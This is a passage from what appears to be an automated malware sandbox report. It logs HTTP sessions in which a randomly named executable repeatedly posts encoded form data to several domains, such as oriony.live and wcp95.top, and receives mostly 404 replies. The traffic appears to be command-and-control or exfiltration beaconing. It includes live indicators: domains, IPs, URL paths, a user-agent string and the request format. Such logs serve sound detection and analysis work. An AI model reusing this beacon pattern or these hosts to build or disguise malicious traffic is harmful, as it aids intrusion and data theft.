                                                                                                Data Ascii: IBQP=O5asKd1tLwcxs6w4KKFUcwv48zPua4OtcRw4IOrFhti+QJ6S5fAl1YH5P019vrhb6MwxGrzlHVlSrKjqcQDx3WWAF+RxXlG/eRHblT26dSKb21e6A7dZ92/scMOGkjAK+e3DbZZpIDGJuXiwpckKsE/G8LW0aHxLxt3fWkemBDbmcKpCMLwXbc/B8FNVYJK98g==
                                                                                                Nov 11, 2024 17:02:11.561925888 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:11 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                18  192.168.11.20  49764  192.64.118.221  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:14.079031944 CET  773  OUT  POST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeG+QoqS4asl54H5c014wbhq6M0XGrPlHVBSrOnqcjb22GWCcuRzUVG/eRHblTScdTib2AO6Badahm/rK8OG1TAO+e2WbYFPIBOJuSGwntkNnE/AzrXdeCsn5/CobFqTEhbbdckYR5EzYPjz4109aLLmhoINpUTzUQsGF/YRC/uati8=
                                                                                                Nov 11, 2024 17:02:14.383464098 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:14 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                19  192.168.11.20  49765  192.64.118.221  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:16.907685041 CET  2578  OUT  POST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeO+Q6yS594l44H5HU15wbhN6MMTGrCaHXJStrzqaSb28GWCB+RwXlGmeRXflTicdTib2B+6HLdajm/scMOKkjAm+e+GbYx5JxuJuyWwq7IN40/C67XFeCo45/PRbG2qEmPbfL1dCK0/Gu/W80IrWprJ5o4f/GzEXQ5VKI0HSvyj4V5shrIr9ej/58UNwBuDgxYqplDUAtcxtynx2/Mz4F0lhm13mZFnMEjPQCZOf9Ydjw/kewWg49h/7exTH23PtdNA8I847Gl7/pqXKnh3SujiDl1wbIcxyFh0iFm+CjNk491sIf3TA6RCeuKupf+kq/tT3rKqWxJvci8p/w/RQfxBVrRciFJXOS/lWL1t3CNnOAN46ihy41+J6ORfO7KOq0+BRlwMIn58qYG55lcMVTv3edAm+FlH9QX6+guNUxeqjPDZaDKcQen+q+eDyhCwIBR79bT1UNXUNFFNc/0mGctRJTrO+EDtGAVCtIWSjIqlTu+p8cCw1c6LpFHoeE+nHUtSNkCWgy2owK9HqG0DDY1zveBIgztUF4Nq8aOPGDcg0Ol/MPRJWrqTLiWO36WIPL9p4afJ7bNT8iBv1yEKUyyE0y3sLVN2+z6qoV13ZC5yHmFDLgcSmFQwYbMGKkg01BMYeoM2r4qdSswjjb50Qu+8mG82qQHbW3LTK8wsSxmOSBGE8LeHkk9ktZNxVwlWgF/Qcp8kEHnSHFXxErrD76R6MGfOK+J/hHfNW0RfGUTp91jezxJsxh61pB/X9Co2F/eZdcoDIjbTeKIdhbiMszcqmag9FWBZMbPFOgA/loCYxBzw0/1VSM0Np9Ag9l9OpPnxzOLmuTuILNkq52nccpdW9ksJ/E37QRaX4qgJC0sgLhu+SoVdWF4jdCIz4gcybNk4+pCAks877uMwHv2vlp3qkAWJXbd76vQJqB+g07gaom0yLr14Wi0IPSFcgydsb/MZt6b [TRUNCATED]
                                                                                                Nov 11, 2024 17:02:16.907705069 CET  3867  OUT
                                                                                                Data Ascii: +8KoBl6yiibDBlAjm7s1OsTBk4NdLjGuFfvRjD3FbFHuIOUrubdMLr6q0T684gD5nRQHciUbL0O3QXqYw2cE9FTDAxvFCsJqsI1w5EPFcw47Aa0JlblUm5JUhwmfOBnXOYLaZ6rg5zX4Wo/Hkj7jlx0/JKkz0twbT+8hf+r2inaA1d8H7BwosxszRA12DCTrhhVU4HRxGmGPRfHbcEP5Yg/8eMAWFULL0wDBgRQCMplFpcDu8V4
                                                                                                Nov 11, 2024 17:02:16.907778978 CET  1477  OUT
                                                                                                Data Ascii: hVg2NmqtgaSmQADZieCZxJyBH2VNADKnPuB1e5FeZaudRCLpHgNCiYBk6d8iN1v+cy+/6m2UDzPTCc1Tf2TwgXkMu6VJxMNEQ/wRROTCh/ySKILZK70l2RVhbkJ+pOjyTRMjqBVj02Aq7nD08wIgLRNtvspc9rVX7HOpWVMyBZlDHQk7nT/C4YzJKW7s8TzE2e5dKudtaOJO1DGuZFE1Z4uqSQfKJOjlGByuBEX+077pE1mXF/V
                                                                                                Nov 11, 2024 17:02:17.217278004 CET  533  IN  HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:17 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                20  192.168.11.20  49766  192.64.118.221  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:19.733612061 CET  495  OUT  GET /baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:20.040266037 CET  548  IN  HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:02:19 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                21  192.168.11.20  49767  154.23.184.95  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:25.616754055 CET  747  OUT  POST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqwDu2imPoSg77yaJW7Zo1PubxI3L5zJiDjDiaDxO5Z46dOwYhZJz7H300b2B+l+a26ji6wd2AaG+58XDavUSs9Vay6BMD07bFEgrNbjYuGL45+PdtF/OVpNEmUzKAfVLDoiCqbzDGN5YeUDDFG7oF4q7hUwdkiMogGJdtGpNXT/rEcRSokCS5dQ==
                                                                                                Nov 11, 2024 17:02:25.956283092 CET  312  IN  HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:25 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                22  192.168.11.20  49768  154.23.184.95  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:28.456976891 CET  767  OUT  POST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqyj+2lB7oDw783aJWx5pyPunxIyyizcKDjhqaC1a5Qo6dWgYodJzGH34ab39+l+e26iy6wqqDaW+nw3DYh0Ss9Vay6BZU07zFHQ7NYHMtFL42zfdtB/OZpNE+UyGqfTPDoiSqbBrHH5YYajCuK40I0I7MTCc57/8/DfQ3bb5zQs32YhrAmATiAVMf7CDRTKoGlaTqP+PVOmk=
                                                                                                Nov 11, 2024 17:02:28.770477057 CET  312  IN  HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:28 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                23  192.168.11.20  49769  154.23.184.95  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:31.327910900 CET  1289  OUT  POST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:31.328037977 CET  6627  OUT
                                                                                                Data Ascii: SjgNbm0zqH+4Z0dKxaIbjhl4unZgT9cSnQJ/Ad20lT1wOTvau6DwCVJHS7akvbiYdt4ZKB/hrqk1ApI7TQgJNuPIOd+bHYtbSPB4BIrDqfIJSuWSVjX3aQzwQX4T/OmCyJXOV67m26wzWrULVC6zpqviL+ANpmhlkFSeqBBkxf2OMFoLySsi5mrlqd8xBJzXbbY3efmLiqePh1HtJNhZoLCQL6RcfGGs+dqRkX0gN+Fwg0yAF1G
                                                                                                Nov 11, 2024 17:02:31.669975042 CET  312  IN  HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:31 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                24  192.168.11.20  49770  154.23.184.95  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:34.199379921 CET  493  OUT  GET /nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:34.538172960 CET  312  IN  HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:02:34 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                25  192.168.11.20  49771  13.248.169.48  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:39.955378056 CET  765  OUT  POST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoTotfDct9fWgWLwsCJlL2YmgEQ6Jr0fgXccd3mKUgP96q/8a4RfuFEnOHVliDCrsoJ/2lBM88Y2N6HJSlQj/c7nUcZpBgmTIC+tDJrxgWSuCJykVREcprmtAX7BaebD8SO1nUGMmzgvGSYLudk2tnHLLOSHAxQ9J1yoB50gcJTxcgIyY/7Yissfg==


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                26  192.168.11.20  49772  13.248.169.48  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:42.619852066 CET  785  OUT  POST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoToNPDdM9fRAWIu8CJrr3wmgIQ6MbkfTjcSZnmLVgP+6q/364QQOFPnODnlj/CrssJ/09BNN8Hs96FdilS+Pc7nUcZpBccTJq+tSZrwEKVwSJx0FRELZritAXJBbS1D+aO1mkGN0bn4WSePud2weSxQpG8NHVQkrNupX0u9u93yP862oGTagt3Cl7ebd2BPzWV+SOd+GMOIMk=


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                27  192.168.11.20  49773  13.248.169.48  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:45.290671110 CET  1289  OUT  POST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:45.290719032 CET  1289  OUT
                                                                                                Data Ascii: GGqIu9uxVgtaVkT23/OWQbZejSHzlOsiqBIKIX7KcaafH1z0QW+tqJ05DXLtn31mjUoSnGx+/GRvAxWb/qt2C/b0h+DW3Ew2z9Is4+icac4sm2vRJCMaJ1sHhxgAPvUjLAcMBxAWWPJYF8BaRNZ3wafiNOU0fOs/Y9JdjynCwumSqfVU6GDbZazvYVZcF0EuzUSY7mOHdVjILILEYO3mn7tHMXoVHVDAaHrWm8Vhy5v78WTW24S
                                                                                                Nov 11, 2024 17:02:45.290772915 CET  5356  OUT
                                                                                                Data Ascii: yGLlzYYPdm60RAqFL388ri24CTK2RxxLTXaexafyepP8PTJNRw00lnP6n6VnFoWCRlurdVxobgpZKfWjcfdo84oLi7hq5hAPZngyXJ7lB4ybT4hlSiQNTx3cLz3307YTGqBuozJi5/VfRjnqGUHjASzfDzvNrDHe2r0QyRsD3G8ccKOMW9BS37c/1uRQDVHILerdYFJusXxYbLEJ6bBp0OyDyYEyCJJhMk2WF9nNm1c47Lh+SSh


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                28  192.168.11.20  49774  13.248.169.48  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:47.960872889 CET  499  OUT  GET /a5kc/?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:48.096805096 CET  400  IN  HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:02:48 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                29  192.168.11.20  49775  3.33.130.190  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:53.431359053 CET  777  OUT  POST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnXn+QxJz2rVNqYn30pG0xsers+WSh5S5zxs3StisS974y5W0wUASEZCGEHjRcqVf2w06XkUX9bv013evQHOp0QS82b+yWIaBVHGEev3YVoLuQiEDUCXFS0Uace5ykzRY/WO1EYCSv981EC8rYXbmb5uadab857ZogywOCAo070JM4+Kkug04CTQ==


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                30  192.168.11.20  49776  3.33.130.190  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:56.101978064 CET  797  OUT  POST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnWGOQzqb26lNpBX30gm01sevs+U+x5gdzxMHSumYS0r4ygm1bbgSfZCKqHnNcqR32w1KXknP+a/0zvuvSJup0QS82b4fzIbpVH20evWYS37uTyUDUTHFW0Uaye4vBzSg/WMdEZQ6s381GMcqIUJLXhta6coUQicw9zmDYdaAf3aQK66dGi25ZOZop8tP3u6/OTPCMcrkdwsM=


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                31  192.168.11.20  49777  3.33.130.190  80  7940  C:\Program Files (x86)\tMdXliauqepYkyZtkrFMcEPFMfPFeFIyXfsJKWlmRQRpaPKIhyaHQmZZJ\ptzMmYcrKro.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                Nov 11, 2024 17:02:58.754354954 CET  1289  OUT  POST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:02:58.754415989 CET | 6657 | OUT
